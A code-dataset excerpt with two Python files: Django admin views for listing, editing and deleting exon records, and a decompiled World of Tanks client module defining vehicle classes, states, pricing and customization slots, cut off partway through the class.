| no_license | duytran92-cse/nas-genodata | 4d8659a135913d226842ff6a013324714ead0458 | 80c88f42145f729c5862a5293012e71548182e1d | refs/heads/master | 2022-11-13T17:24:03.769605 | 2020-06-14T18:59:36 | 2020-06-14T18:59:36 | 272,264,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,962 | py | from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from notasquare.urad_web import actions, page_contexts, widgets
from notasquare.urad_web_material import renderers
from application import constants
from . import components
import json
class List(actions.crud.ListAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class TableRenderer(renderers.widgets.table.DataTableRenderer):
def render_cell_actions(self, table, row):
html = '<div class="btn-group btn-group">'
html += ' <a class="btn btn-xs btn-primary" href="/exon/update/%s">Edit</a>' % (row['id'])
html += ' <a class="btn btn-xs btn-danger" href="/exon/delete/%s" onclick="return confirm(\'Are you really want to delete this?\')">Delete</a>' % (row['id'])
html += '</div>'
return html
def create_table(self):
table = widgets.table.DataTable()
table.set_title('Exon')
table.set_subtitle('List of exon')
# table.create_button('create', '/exon/create', 'zmdi-plus')
table.create_column('id', 'ID', '10%', sortable=True)
table.create_column('code', 'Code', '60%')
table.create_column('actions', '', '14%')
table.add_field(widgets.field.Textbox('text'))
table.add_field(widgets.field.Combobox('is_good_quality', choices=constants.FILTER))
table.renderer = self.TableRenderer()
table.renderer.table_form_renderer = renderers.widgets.form.TableFormRenderer()
table.renderer.table_form_renderer.add_field('text', 'Search', colspan=8)
table.renderer.table_form_renderer.add_field('is_good_quality', 'Quality', colspan=4)
table.renderer.table_form_renderer.set_field_renderer('textbox', renderers.widgets.field.TextboxRenderer())
table.renderer.table_form_renderer.set_field_renderer('combobox', renderers.widgets.field.ComboboxRenderer())
return table
def load_table_data(self, table_form_data, sortkey, sortdir, page_number):
return components.PageStore(self.get_container()).list(table_form_data, sortkey, sortdir, page_number)
class Update(actions.crud.FormAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class PageUpdateRenderer(renderers.page_update.PageUpdateRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.PageUpdateRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).get(self.params['code'])
def GET(self):
page_context = self.create_page_context()
table_widget = self.create_table()
data = self.load_table_data()
data['page_id'] = 'exon'
table_widget.set_data(data)
page_context.add_widget(table_widget)
return HttpResponse(page_context.render())
class History(actions.crud.FormAction):
class HistoryRenderer(renderers.page_update.HistoryRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.HistoryRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).history(self.params['code'], self.params['field'])
def GET(self):
page_context = renderers.page_update.HistoryRenderer()
table_widget = self.create_table()
record = self.load_table_data()
data = {}
data['data'] = record
data['text'] = {'field': self.params['field'], 'code': self.params['code']}
return HttpResponse(page_context.render(data))
class Delete(actions.crud.DeleteAction):
def GET(self):
result = components.PageStore(self.get_container()).delete(self.params['id'])
return HttpResponseRedirect('/exon/list')
| [
"[email protected]"
]
| |
387308b74fb49e09ecf27a6ac0913c5f93a7db68 | 03e3138f99f275d15d41a5c5bfb212f85d64d02e | /source/res/scripts/client/gui/shared/gui_items/Vehicle.py | a9de541eb0b94156095065137fb6d9ebcfcb6b47 | []
| no_license | TrenSeP/WorldOfTanks-Decompiled | e428728e7901146d0b599d02c930d70532232a97 | 1faa748acec1b7e435b657fd054ecba23dd72778 | refs/heads/1.4.1 | 2020-04-27T08:07:49.813023 | 2019-03-05T17:37:06 | 2019-03-05T17:37:06 | 174,159,837 | 1 | 0 | null | 2019-03-06T14:33:33 | 2019-03-06T14:24:36 | Python | UTF-8 | Python | false | false | 63,552 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/gui_items/Vehicle.py
import math
import random
from copy import copy
from itertools import izip
from operator import itemgetter
from collections import namedtuple
import BigWorld
import constants
from AccountCommands import LOCK_REASON, VEHICLE_SETTINGS_FLAG
from account_shared import LayoutIterator
from constants import WIN_XP_FACTOR_MODE, RentType
from gui.impl.gen import R
from rent_common import parseRentID
from gui import makeHtmlString
from gui.Scaleform.genConsts.STORE_CONSTANTS import STORE_CONSTANTS
from gui.Scaleform.locale.ITEM_TYPES import ITEM_TYPES
from gui.Scaleform.locale.RES_ICONS import RES_ICONS
from gui.Scaleform.locale.RES_SHOP_EXT import RES_SHOP_EXT
from gui.prb_control import prb_getters, prbDispatcherProperty
from gui.prb_control.settings import PREBATTLE_SETTING_NAME
from gui.shared.economics import calcRentPackages, getActionPrc, calcVehicleRestorePrice
from gui.shared.formatters import text_styles
from gui.shared.gui_items import CLAN_LOCK, GUI_ITEM_TYPE, getItemIconName, GUI_ITEM_ECONOMY_CODE
from gui.shared.gui_items.customization.slots import ProjectionDecalSlot, BaseCustomizationSlot, EmblemSlot
from gui.shared.gui_items.customization.slots import ANCHOR_TYPE_TO_SLOT_TYPE_MAP
from gui.shared.gui_items.customization.outfit import Area, REGIONS_BY_SLOT_TYPE
from gui.shared.gui_items.vehicle_equipment import VehicleEquipment
from gui.shared.gui_items.gui_item import HasStrCD
from gui.shared.gui_items.fitting_item import FittingItem, RentalInfoProvider
from gui.shared.gui_items.Tankman import Tankman
from gui.shared.money import MONEY_UNDEFINED, Currency, Money
from gui.shared.gui_items.gui_item_economics import ItemPrice, ItemPrices, ITEM_PRICE_EMPTY
from gui.shared.utils import makeSearchableString
from helpers import i18n, time_utils, dependency, func_utils
from items import vehicles, tankmen, customizations, getTypeInfoByName, getTypeOfCompactDescr, makeIntCompactDescrByID
from items.components.c11n_constants import SeasonType, CustomizationType, StyleFlags, HIDDEN_CAMOUFLAGE_ID
from shared_utils import findFirst, CONST_CONTAINER
from skeletons.gui.game_control import IIGRController, IRentalsController
from skeletons.gui.lobby_context import ILobbyContext
from skeletons.gui.server_events import IEventsCache
from debug_utils import LOG_ERROR
class VEHICLE_CLASS_NAME(CONST_CONTAINER):
LIGHT_TANK = 'lightTank'
MEDIUM_TANK = 'mediumTank'
HEAVY_TANK = 'heavyTank'
SPG = 'SPG'
AT_SPG = 'AT-SPG'
VEHICLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
EmblemSlotHelper = namedtuple('EmblemSlotHelper', ['tankAreaSlot', 'tankAreaId'])
SlotHelper = namedtuple('SlotHelper', ['tankAreaSlot', 'tankAreaId'])
VEHICLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TYPES_ORDER)))
UNKNOWN_VEHICLE_CLASS_ORDER = 100
def compareByVehTypeName(vehTypeA, vehTypeB):
return VEHICLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TYPES_ORDER_INDICES[vehTypeB]
def compareByVehTableTypeName(vehTypeA, vehTypeB):
return VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeB]
VEHICLE_TABLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_TABLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TABLE_TYPES_ORDER)))
VEHICLE_TABLE_TYPES_ORDER_INDICES_REVERSED = dict(((n, i) for i, n in enumerate(reversed(VEHICLE_TABLE_TYPES_ORDER))))
VEHICLE_BATTLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_BATTLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_BATTLE_TYPES_ORDER)))
class VEHICLE_TAGS(CONST_CONTAINER):
PREMIUM = 'premium'
PREMIUM_IGR = 'premiumIGR'
CANNOT_BE_SOLD = 'cannot_be_sold'
SECRET = 'secret'
SPECIAL = 'special'
OBSERVER = 'observer'
DISABLED_IN_ROAMING = 'disabledInRoaming'
EVENT = 'event_battles'
EXCLUDED_FROM_SANDBOX = 'excluded_from_sandbox'
TELECOM = 'telecom'
UNRECOVERABLE = 'unrecoverable'
CREW_LOCKED = 'lockCrew'
OUTFIT_LOCKED = 'lockOutfit'
EPIC_BATTLES = 'epic_battles'
RENT_PROMOTION = 'rent_promotion'
_NOT_FULL_AMMO_MULTIPLIER = 0.2
_MAX_RENT_MULTIPLIER = 2
RentPackagesInfo = namedtuple('RentPackagesInfo', ('hasAvailableRentPackages', 'mainRentType', 'seasonType'))
class Vehicle(FittingItem, HasStrCD):
__slots__ = ('__customState', '_inventoryID', '_xp', '_dailyXPFactor', '_isElite', '_isFullyElite', '_clanLock', '_isUnique', '_rentPackages', '_rentPackagesInfo', '_isDisabledForBuy', '_isSelected', '_restorePrice', '_canTradeIn', '_canTradeOff', '_tradeOffPriceFactor', '_tradeOffPrice', '_searchableUserName', '_personalDiscountPrice', '_rotationGroupNum', '_rotationBattlesLeft', '_isRotationGroupLocked', '_isInfiniteRotationGroup', '_settings', '_lock', '_repairCost', '_health', '_gun', '_turret', '_engine', '_chassis', '_radio', '_fuelTank', '_optDevices', '_shells', '_equipment', '_equipmentLayout', '_bonuses', '_crewIndices', '_slotsIds', '_crew', '_lastCrew', '_hasModulesToSelect', '_customOutfits', '_styledOutfits', '_slotsAnchors')
class VEHICLE_STATE(object):
DAMAGED = 'damaged'
EXPLODED = 'exploded'
DESTROYED = 'destroyed'
UNDAMAGED = 'undamaged'
BATTLE = 'battle'
IN_PREBATTLE = 'inPrebattle'
LOCKED = 'locked'
CREW_NOT_FULL = 'crewNotFull'
AMMO_NOT_FULL = 'ammoNotFull'
AMMO_NOT_FULL_EVENTS = 'ammoNotFullEvents'
SERVER_RESTRICTION = 'serverRestriction'
RENTAL_IS_OVER = 'rentalIsOver'
IGR_RENTAL_IS_OVER = 'igrRentalIsOver'
IN_PREMIUM_IGR_ONLY = 'inPremiumIgrOnly'
GROUP_IS_NOT_READY = 'group_is_not_ready'
NOT_PRESENT = 'notpresent'
UNAVAILABLE = 'unavailable'
UNSUITABLE_TO_QUEUE = 'unsuitableToQueue'
UNSUITABLE_TO_UNIT = 'unsuitableToUnit'
CUSTOM = (UNSUITABLE_TO_QUEUE, UNSUITABLE_TO_UNIT)
DEAL_IS_OVER = 'dealIsOver'
ROTATION_GROUP_UNLOCKED = 'rotationGroupUnlocked'
ROTATION_GROUP_LOCKED = 'rotationGroupLocked'
RENTABLE = 'rentable'
RENTABLE_AGAIN = 'rentableAgain'
CAN_SELL_STATES = [VEHICLE_STATE.UNDAMAGED,
VEHICLE_STATE.CREW_NOT_FULL,
VEHICLE_STATE.AMMO_NOT_FULL,
VEHICLE_STATE.GROUP_IS_NOT_READY,
VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
VEHICLE_STATE.UNSUITABLE_TO_UNIT,
VEHICLE_STATE.ROTATION_GROUP_UNLOCKED,
VEHICLE_STATE.ROTATION_GROUP_LOCKED]
GROUP_STATES = [VEHICLE_STATE.GROUP_IS_NOT_READY]
class VEHICLE_STATE_LEVEL(object):
CRITICAL = 'critical'
INFO = 'info'
WARNING = 'warning'
RENTED = 'rented'
RENTABLE = 'rentableBlub'
igrCtrl = dependency.descriptor(IIGRController)
eventsCache = dependency.descriptor(IEventsCache)
lobbyContext = dependency.descriptor(ILobbyContext)
rentalsController = dependency.descriptor(IRentalsController)
def __init__(self, strCompactDescr=None, inventoryID=-1, typeCompDescr=None, proxy=None):
if strCompactDescr is not None:
vehDescr = vehicles.VehicleDescr(compactDescr=strCompactDescr)
else:
_, nID, innID = vehicles.parseIntCompactDescr(typeCompDescr)
vehDescr = vehicles.VehicleDescr(typeID=(nID, innID))
HasStrCD.__init__(self, strCompactDescr)
FittingItem.__init__(self, vehDescr.type.compactDescr, proxy)
self._descriptor = vehDescr
self._inventoryID = inventoryID
self._xp = 0
self._dailyXPFactor = -1
self._isElite = False
self._isFullyElite = False
self._clanLock = 0
self._isUnique = self.isHidden
self._rentPackages = []
self._rentPackagesInfo = RentPackagesInfo(False, None, None)
self._isDisabledForBuy = False
self._isSelected = False
self._restorePrice = None
self._canTradeIn = False
self._canTradeOff = False
self._tradeOffPriceFactor = 0
self._tradeOffPrice = MONEY_UNDEFINED
self._rotationGroupNum = 0
self._rotationBattlesLeft = 0
self._isRotationGroupLocked = False
self._isInfiniteRotationGroup = False
self._unlockedBy = []
self._customOutfits = {}
self._styledOutfits = {}
if self.isPremiumIGR:
self._searchableUserName = makeSearchableString(self.shortUserName)
else:
self._searchableUserName = makeSearchableString(self.userName)
invData = dict()
tradeInData = None
if proxy is not None and proxy.inventory.isSynced() and proxy.stats.isSynced() and proxy.shop.isSynced() and proxy.vehicleRotation.isSynced() and proxy.recycleBin.isSynced():
invDataTmp = proxy.inventory.getItems(GUI_ITEM_TYPE.VEHICLE, inventoryID)
if invDataTmp is not None:
invData = invDataTmp
tradeInData = proxy.shop.tradeIn
self._xp = proxy.stats.vehiclesXPs.get(self.intCD, self._xp)
if proxy.shop.winXPFactorMode == WIN_XP_FACTOR_MODE.ALWAYS or self.intCD not in proxy.stats.multipliedVehicles and not self.isOnlyForEventBattles:
self._dailyXPFactor = proxy.shop.dailyXPFactor
self._isElite = not vehDescr.type.unlocksDescrs or self.intCD in proxy.stats.eliteVehicles
self._isFullyElite = self.isElite and not any((data[1] not in proxy.stats.unlocks for data in vehDescr.type.unlocksDescrs))
clanDamageLock = proxy.stats.vehicleTypeLocks.get(self.intCD, {}).get(CLAN_LOCK, 0)
clanNewbieLock = proxy.stats.globalVehicleLocks.get(CLAN_LOCK, 0)
self._clanLock = clanDamageLock or clanNewbieLock
self._isDisabledForBuy = self.intCD in proxy.shop.getNotToBuyVehicles()
invRentData = invData.get('rent')
if invRentData is not None:
self._rentInfo = RentalInfoProvider(isRented=True, *invRentData)
hasAvailableRentPackages, mainRentType, seasonType = self.rentalsController.getRentPackagesInfo(proxy.shop.getVehicleRentPrices().get(self.intCD, {}), self._rentInfo)
self._rentPackagesInfo = RentPackagesInfo(hasAvailableRentPackages, mainRentType, seasonType)
self._isSelected = bool(self.invID in proxy.stats.oldVehInvIDs)
self._customOutfits = self._parseCustomOutfits(self.intCD, proxy, self.descriptor.type.hasCustomDefaultCamouflage)
self._styledOutfits = self._parseStyledOutfits(self.intCD, proxy)
restoreConfig = proxy.shop.vehiclesRestoreConfig
self._restorePrice = calcVehicleRestorePrice(self.buyPrices.itemPrice.defPrice, proxy.shop)
self._restoreInfo = proxy.recycleBin.getVehicleRestoreInfo(self.intCD, restoreConfig.restoreDuration, restoreConfig.restoreCooldown)
self._personalDiscountPrice = proxy.shop.getPersonalVehicleDiscountPrice(self.intCD)
self._rotationGroupNum = proxy.vehicleRotation.getGroupNum(self.intCD)
self._rotationBattlesLeft = proxy.vehicleRotation.getBattlesCount(self.rotationGroupNum)
self._isRotationGroupLocked = proxy.vehicleRotation.isGroupLocked(self.rotationGroupNum)
self._isInfiniteRotationGroup = proxy.vehicleRotation.isInfinite(self.rotationGroupNum)
self._unlockedBy = proxy.vehicleRotation.unlockedBy(self.rotationGroupNum)
self._inventoryCount = 1 if invData.keys() else 0
self._settings = invData.get('settings', 0)
self._lock = invData.get('lock', (0, 0))
self._repairCost, self._health = invData.get('repair', (0, 0))
self._gun = self.itemsFactory.createVehicleGun(vehDescr.gun.compactDescr, proxy, vehDescr.gun)
self._turret = self.itemsFactory.createVehicleTurret(vehDescr.turret.compactDescr, proxy, vehDescr.turret)
self._engine = self.itemsFactory.createVehicleEngine(vehDescr.engine.compactDescr, proxy, vehDescr.engine)
self._chassis = self.itemsFactory.createVehicleChassis(vehDescr.chassis.compactDescr, proxy, vehDescr.chassis)
self._radio = self.itemsFactory.createVehicleRadio(vehDescr.radio.compactDescr, proxy, vehDescr.radio)
self._fuelTank = self.itemsFactory.createVehicleFuelTank(vehDescr.fuelTank.compactDescr, proxy, vehDescr.fuelTank)
sellPrice = self._calcSellPrice(proxy)
defaultSellPrice = self._calcDefaultSellPrice(proxy)
self._sellPrices = ItemPrices(itemPrice=ItemPrice(price=sellPrice, defPrice=defaultSellPrice), itemAltPrice=ITEM_PRICE_EMPTY)
if tradeInData is not None and tradeInData.isEnabled and self.isPremium and not self.isPremiumIGR:
self._tradeOffPriceFactor = tradeInData.sellPriceFactor
tradeInLevels = tradeInData.allowedVehicleLevels
self._canTradeIn = not self.isInInventory and not self.isHidden and self.isUnlocked and not self.isRestorePossible() and self.level in tradeInLevels and not self.isRented
self._canTradeOff = self.isPurchased and not self.canNotBeSold and self.intCD not in tradeInData.forbiddenVehicles and self.level in tradeInLevels
if self.canTradeOff:
self._tradeOffPrice = Money(gold=int(math.ceil(self.tradeOffPriceFactor * self.buyPrices.itemPrice.price.gold)))
self._optDevices = self._parserOptDevs(vehDescr.optionalDevices, proxy)
gunAmmoLayout = []
for shell in self.gun.defaultAmmo:
gunAmmoLayout += (shell.intCD, shell.defaultCount)
self._shells = self._parseShells(invData.get('shells', list()), invData.get('shellsLayout', dict()).get(self.shellsLayoutIdx, gunAmmoLayout), proxy)
self._equipment = VehicleEquipment(proxy, invData.get('eqs'))
self._equipmentLayout = VehicleEquipment(proxy, invData.get('eqsLayout'))
defaultCrew = [None] * len(vehDescr.type.crewRoles)
crewList = invData.get('crew', defaultCrew)
self._bonuses = self._calcCrewBonuses(crewList, proxy)
self._crewIndices = dict([ (invID, idx) for idx, invID in enumerate(crewList) ])
self._crew = self._buildCrew(crewList, proxy)
self._lastCrew = invData.get('lastCrew')
self._rentPackages = calcRentPackages(self, proxy, self.rentalsController)
self._maxRentDuration, self._minRentDuration = self.__calcMinMaxRentDuration()
self._hasModulesToSelect = self.__hasModulesToSelect()
self.__customState = ''
self._slotsAnchorsById, self._slotsAnchors = self.__initAnchors()
return
def __initAnchors(self):
vehDescr = self._descriptor
slotsAnchors = {cType:{area:{} for area in Area.ALL} for cType in GUI_ITEM_TYPE.CUSTOMIZATIONS}
slotsAnchorsById = {}
hullEmblemSlots = EmblemSlotHelper(vehDescr.hull.emblemSlots, Area.HULL)
if vehDescr.turret.showEmblemsOnGun:
turretEmblemSlots = EmblemSlotHelper(vehDescr.turret.emblemSlots, Area.GUN)
else:
turretEmblemSlots = EmblemSlotHelper(vehDescr.turret.emblemSlots, Area.TURRET)
for emblemSlotHelper in (hullEmblemSlots, turretEmblemSlots):
for emblemSlot in emblemSlotHelper.tankAreaSlot:
areaId = emblemSlotHelper.tankAreaId
slotType = ANCHOR_TYPE_TO_SLOT_TYPE_MAP.get(emblemSlot.type, None)
if slotType is not None:
regionIdx = len(slotsAnchors[slotType][areaId])
slot = EmblemSlot(emblemSlot, emblemSlotHelper.tankAreaId, regionIdx)
slotsAnchors[slotType][areaId][regionIdx] = slot
slotsAnchorsById[emblemSlot.slotId] = slot
chassisCustomizationSlots = SlotHelper(vehDescr.chassis.slotsAnchors, Area.CHASSIS)
hullCustomizationSlots = SlotHelper(vehDescr.hull.slotsAnchors, Area.HULL)
turretCustomizationSlots = SlotHelper(vehDescr.turret.slotsAnchors, Area.TURRET)
gunCustomizationSlots = SlotHelper(vehDescr.gun.slotsAnchors, Area.GUN)
for slotHelper in (chassisCustomizationSlots,
hullCustomizationSlots,
turretCustomizationSlots,
gunCustomizationSlots):
for slotsAnchor in slotHelper.tankAreaSlot:
slotType = ANCHOR_TYPE_TO_SLOT_TYPE_MAP.get(slotsAnchor.type, None)
if slotType is not None:
if slotType in (GUI_ITEM_TYPE.PROJECTION_DECAL, GUI_ITEM_TYPE.MODIFICATION, GUI_ITEM_TYPE.STYLE):
areaId = Area.MISC
else:
areaId = slotHelper.tankAreaId
if slotsAnchor.applyTo is not None:
regionIdx = -1
if slotType in REGIONS_BY_SLOT_TYPE[areaId]:
regions = REGIONS_BY_SLOT_TYPE[areaId][slotType]
regionIdx = next((i for i, region in enumerate(regions) if slotsAnchor.applyTo == region), -1)
else:
regionIdx = len(slotsAnchors[slotType][areaId])
if regionIdx == -1:
continue
if slotType == GUI_ITEM_TYPE.PROJECTION_DECAL:
customizationSlot = ProjectionDecalSlot(slotsAnchor, slotHelper.tankAreaId, regionIdx)
else:
customizationSlot = BaseCustomizationSlot(slotsAnchor, slotHelper.tankAreaId, regionIdx)
slotsAnchors[slotType][areaId][regionIdx] = customizationSlot
slotsAnchorsById[customizationSlot.slotId] = customizationSlot
if not slotsAnchors[GUI_ITEM_TYPE.MODIFICATION][Area.MISC]:
slotsAnchors[GUI_ITEM_TYPE.MODIFICATION][Area.MISC] = slotsAnchors[GUI_ITEM_TYPE.STYLE][Area.MISC]
for slot in slotsAnchors[GUI_ITEM_TYPE.PROJECTION_DECAL][Area.MISC].itervalues():
if slot.isChild:
parent = slotsAnchorsById[slot.parentSlotId]
parent.addChild(slot)
return (slotsAnchorsById, slotsAnchors)
def getAnchors(self, slotType, areaId):
return copy(self._slotsAnchors[slotType][areaId])
def getAnchorBySlotId(self, slotType, areaId, regionIdx):
return self._slotsAnchors[slotType][areaId].get(regionIdx, None)
def getAnchorById(self, anchorId):
return self._slotsAnchorsById.get(anchorId, None)
@property
def buyPrices(self):
currency = self._buyPrices.itemPrice.price.getCurrency()
if self._personalDiscountPrice is not None and self._personalDiscountPrice.get(currency) <= self._buyPrices.itemPrice.price.get(currency):
currentPrice = self._personalDiscountPrice
else:
currentPrice = self._buyPrices.itemPrice.price
buyPrice = currentPrice
if self.isRented and not self.rentalIsOver:
if currency == self.rentCompensation.getCurrency():
buyPrice = currentPrice - self.rentCompensation
else:
LOG_ERROR('Compensation currency and purchase currency do not match')
return ItemPrices(itemPrice=ItemPrice(price=buyPrice, defPrice=self._buyPrices.itemPrice.defPrice), itemAltPrice=self._buyPrices.itemAltPrice)
@property
def searchableUserName(self):
return self._searchableUserName
@property
def searchableShortUserName(self):
return makeSearchableString(self.shortUserName)
def getUnlockDescrByIntCD(self, intCD):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
if intCD == data[1]:
return (unlockIdx, data[0], set(data[2:]))
return (-1, 0, set())
def _calcSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.price
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.price
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.price
price = price + modulePrice
return price
def _getDescriptor(self):
return None
def _calcDefaultSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.defPrice
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price + modulePrice
return price
def _calcCrewBonuses(self, crew, proxy):
bonuses = dict()
bonuses['equipment'] = 0.0
for eq in self.equipment.regularConsumables.getInstalledItems():
bonuses['equipment'] += eq.crewLevelIncrease
for battleBooster in self.equipment.battleBoosterConsumables.getInstalledItems():
bonuses['equipment'] += battleBooster.getCrewBonus(self)
bonuses['optDevices'] = self.descriptor.miscAttrs['crewLevelIncrease']
bonuses['commander'] = 0
commanderEffRoleLevel = 0
bonuses['brotherhood'] = tankmen.getSkillsConfig().getSkill('brotherhood').crewLevelIncrease
for tankmanID in crew:
if tankmanID is None:
bonuses['brotherhood'] = 0.0
continue
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
if not tmanInvData:
continue
tdescr = tankmen.TankmanDescr(compactDescr=tmanInvData['compDescr'])
if 'brotherhood' not in tdescr.skills or tdescr.skills.index('brotherhood') == len(tdescr.skills) - 1 and tdescr.lastSkillLevel != tankmen.MAX_SKILL_LEVEL:
bonuses['brotherhood'] = 0.0
if tdescr.role == Tankman.ROLES.COMMANDER:
factor, addition = tdescr.efficiencyOnVehicle(self.descriptor)
commanderEffRoleLevel = round(tdescr.roleLevel * factor + addition)
bonuses['commander'] += round((commanderEffRoleLevel + bonuses['brotherhood'] + bonuses['equipment']) / tankmen.COMMANDER_ADDITION_RATIO)
return bonuses
def _buildCrew(self, crew, proxy):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, tankmanID in enumerate(crew):
tankman = None
if tankmanID is not None:
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
tankman = self.itemsFactory.createTankman(strCompactDescr=tmanInvData['compDescr'], inventoryID=tankmanID, vehicle=self, proxy=proxy)
crewItems.append((idx, tankman))
return sortCrew(crewItems, crewRoles)
@staticmethod
def __crewSort(t1, t2):
return 0 if t1 is None or t2 is None else t1.__cmp__(t2)
def _parseCompDescr(self, compactDescr):
nId, innID = vehicles.parseVehicleCompactDescr(compactDescr)
return (GUI_ITEM_TYPE.VEHICLE, nId, innID)
def _parseShells(self, layoutList, defaultLayoutList, proxy):
shellsDict = dict(((cd, count) for cd, count, _ in LayoutIterator(layoutList)))
defaultsDict = dict(((cd, (count, isBoughtForCredits)) for cd, count, isBoughtForCredits in LayoutIterator(defaultLayoutList)))
layoutList = list(layoutList)
for shot in self.descriptor.gun.shots:
cd = shot.shell.compactDescr
if cd not in shellsDict:
layoutList.extend([cd, 0])
result = list()
for intCD, count, _ in LayoutIterator(layoutList):
defaultCount, isBoughtForCredits = defaultsDict.get(intCD, (0, False))
result.append(self.itemsFactory.createShell(intCD, count, defaultCount, proxy, isBoughtForCredits))
return result
@classmethod
def _parseCustomOutfits(cls, compactDescr, proxy, hasDefaultCamouflage=False):
outfits = {}
for season in SeasonType.SEASONS:
outfitData = proxy.inventory.getOutfitData(compactDescr, season)
if outfitData:
outfits[season] = cls.itemsFactory.createOutfit(strCompactDescr=outfitData.compDescr, isEnabled=bool(outfitData.flags & StyleFlags.ENABLED), isInstalled=bool(outfitData.flags & StyleFlags.INSTALLED), proxy=proxy)
if hasDefaultCamouflage:
outfit = cls.itemsFactory.createOutfit(isInstalled=True, isEnabled=True)
hiddenCamoCD = makeIntCompactDescrByID('customizationItem', CustomizationType.CAMOUFLAGE, HIDDEN_CAMOUFLAGE_ID)
camo = cls.itemsFactory.createCustomization(hiddenCamoCD)
outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).set(camo)
outfits[season] = outfit
outfits[season] = cls.itemsFactory.createOutfit()
return outfits
@classmethod
def _parseStyledOutfits(cls, compactDescr, proxy):
outfits = {}
outfitData = proxy.inventory.getOutfitData(compactDescr, SeasonType.ALL)
if not outfitData or not bool(outfitData.flags & StyleFlags.ENABLED):
return outfits
component = customizations.parseCompDescr(outfitData.compDescr)
styleIntCD = vehicles.makeIntCompactDescrByID('customizationItem', CustomizationType.STYLE, component.styleId)
style = vehicles.getItemByCompactDescr(styleIntCD)
for styleSeason in SeasonType.SEASONS:
outfitComp = style.outfits.get(styleSeason)
outfits[styleSeason] = cls.itemsFactory.createOutfit(component=outfitComp, isEnabled=bool(outfitData.flags & StyleFlags.ENABLED), isInstalled=bool(outfitData.flags & StyleFlags.INSTALLED), proxy=proxy)
return outfits
@classmethod
def _parserOptDevs(cls, layoutList, proxy):
result = list()
for i in xrange(len(layoutList)):
optDevDescr = layoutList[i]
result.append(cls.itemsFactory.createOptionalDevice(optDevDescr.compactDescr, proxy) if optDevDescr is not None else None)
return result
@property
def iconContour(self):
return getContourIconPath(self.name)
@property
def iconUnique(self):
return getUniqueIconPath(self.name, withLightning=False)
@property
def iconUniqueLight(self):
return getUniqueIconPath(self.name, withLightning=True)
def getShopIcon(self, size=STORE_CONSTANTS.ICON_SIZE_MEDIUM):
name = getNationLessName(self.name)
return RES_SHOP_EXT.getVehicleIcon(size, name)
@property
def shellsLayoutIdx(self):
return (self.turret.descriptor.compactDescr, self.gun.descriptor.compactDescr)
@property
def invID(self):
return self._inventoryID
@property
def xp(self):
return self._xp
@property
def dailyXPFactor(self):
return self._dailyXPFactor
@property
def isElite(self):
return self._isElite
@property
def isFullyElite(self):
return self._isFullyElite
@property
def clanLock(self):
return self._clanLock
@property
def isUnique(self):
return self._isUnique
@property
def rentPackages(self):
return self._rentPackages
@property
def hasRentPackages(self):
return self._rentPackagesInfo.hasAvailableRentPackages
@property
def getRentPackagesInfo(self):
return self._rentPackagesInfo
@property
def isDisabledForBuy(self):
return self._isDisabledForBuy
@property
def isSelected(self):
return self._isSelected
@property
def restorePrice(self):
return self._restorePrice
@property
def canTradeIn(self):
return self._canTradeIn
@property
def canTradeOff(self):
return self._canTradeOff
@property
def tradeOffPriceFactor(self):
return self._tradeOffPriceFactor
@property
def tradeOffPrice(self):
return self._tradeOffPrice
@property
def rotationGroupNum(self):
return self._rotationGroupNum
@property
def rotationBattlesLeft(self):
return self._rotationBattlesLeft
@property
def isRotationGroupLocked(self):
return self._isRotationGroupLocked
@property
def unlockedBy(self):
return self._unlockedBy
@property
def isInfiniteRotationGroup(self):
return self._isInfiniteRotationGroup
@property
def settings(self):
